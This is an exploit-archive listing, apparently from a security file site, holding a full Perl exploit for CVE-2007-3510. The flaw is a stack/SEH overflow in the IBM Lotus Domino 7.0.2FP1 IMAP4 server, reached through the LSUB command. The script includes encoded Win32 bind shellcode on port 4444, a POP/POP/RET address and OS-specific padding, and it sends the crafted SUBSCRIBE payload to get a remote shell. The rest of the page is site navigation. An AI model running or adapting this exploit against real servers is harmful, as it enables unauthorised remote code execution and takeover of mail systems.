CVE-2007-3510.pl.txt

CVE-2007-3510.pl.txt: Posted Oct 29, 2007; Authored by Manuel Santamarina Suarez; IBM Lotus Domino IMAP4 server LSUB command exploit. Binds a shell to tcp/4444.; tags | exploit, shell, tcp; advisories | CVE-2007-3510; SHA-256 | 773b707809d24e3b39210ae41f67d5268fb2011eb73260a3b0f1c8900b05ac7e; Download | Favorite | View

CVE-2007-3510.pl.txt

#!perl
#
# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit
#
# Author:  Manuel Santamarina Suarez
# e-Mail:  FistFuXXer@gmx.de
#

use IO::Socket;
use File::Basename;

#
# destination TCP port
#
$port = 143;

#
# SE handler
#
# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
# You must use a POP/POP/RET sequence that doesn't modify the ESP register or
# the shellcode decoder will fail.
#
$seh = reverse( "\x60\x21\x53\x4E" );  # POP EDI/POP EBP/RET
                                       # nnotes.6021534e
                                       # universal on Lotus Domino 7.0.2FP1


#
# Shellcode
# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
#
# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444)
# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP)
#
$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI".
      "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS".
      "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV".
      "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3".
      "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo".
      "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo".
      "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp".
      "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc".
      "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M".
      "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70".
      "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs".
      "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA";

#
# JUMP to 'ESP adjustment' and shellcode
#
$jmp = "\x74\x20".  # JE SHORT
       "\x75\x20";  # JNZ SHORT


#
#
# Don't edit anything after this line
#
#

$sc_limit = 2300;

sub usage {
    print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n".
          "Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n".
          "\n".
          "Targets:\n".
          "[1]  Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n".
          "[2]  Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n";
    exit;
}


# Net::IP::ip_is_ipv4
sub ip_is_ipv4 {
    my $ip = shift;

    unless ($ip =~ m/^[\d\.]+$/) {
        return 0;
    }

    if ($ip =~ m/^\./) {
        return 0;
    }

    if ($ip =~ m/\.$/) {
        return 0;
    }

    if ($ip =~ m/^(\d+)$/ and $1 < 256) {
        return 1
    }

    my $n = ($ip =~ tr/\./\./);

    unless ($n >= 0 and $n < 4) {
        return 0;
    }

    if ($ip =~ m/\.\./) {
        return 0;
    }

    foreach (split /\./, $ip) {
        unless ($_ >= 0 and $_ < 256) {
            return 0;
        }
    }
    
    return 1;
}


print "--------------------------------------------------------\n".
      ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n".
      "--------------------------------------------------------\n\n";

if( ($#ARGV+1) != 4 ) {
    &usage;
}

$user = $ARGV[2];
$pass = $ARGV[3];

# Windows 2000 SP4
if( $ARGV[0] == 1 ) {
    $popad = "\x41" x 3 .  # INC ECX
             "\x61" x 51;  # POPAD
}
# Windows 2003 SP2
elsif( $ARGV[0] == 2 ) {
    $popad = "\x41" x 2 .  # INC ECX
             "\x61" x 52;  # POPAD
}
else {
    &usage;
}
    
if( ip_is_ipv4( $ARGV[1] ) ) {
    $ip = $ARGV[1];
}
else
{
    &usage;
}

if( length( $sc ) > $sc_limit ) {
    print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n";
    exit;
}

print "[+] Connecting to $ip:$port...\n";

$sock = IO::Socket::INET->new (
    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2
) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit;

print "[+] Connected.\n";

$mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000;
$sock->recv( $recv, 1024 );
$sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" );
$sock->recv( $recv, 1024 );

if( $recv ne "a001 OK LOGIN completed\r\n" ) {
    print "[-] Error: Invalid username or password!\n";
    exit;
}

print "[+] Successfully logged in.\n".
      "[+] Trying to overwrite and control the SE handler...\n";

$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" );
$sock->recv( $recv, 1024 );
$sock->send( "$mailbox\r\n" );
$sock->recv( $recv, 1024 );
$sock->send( "a003 LSUB arg1 arg2\r\n" );
sleep( 3 );
close( $sock );

print "[+] Done. Now check for a bind shell on $ip:4444!\n";

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

CVE-2007-3510.pl.txt

CVE-2007-3510.pl.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

CVE-2007-3510.pl.txt

Share This

CVE-2007-3510.pl.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems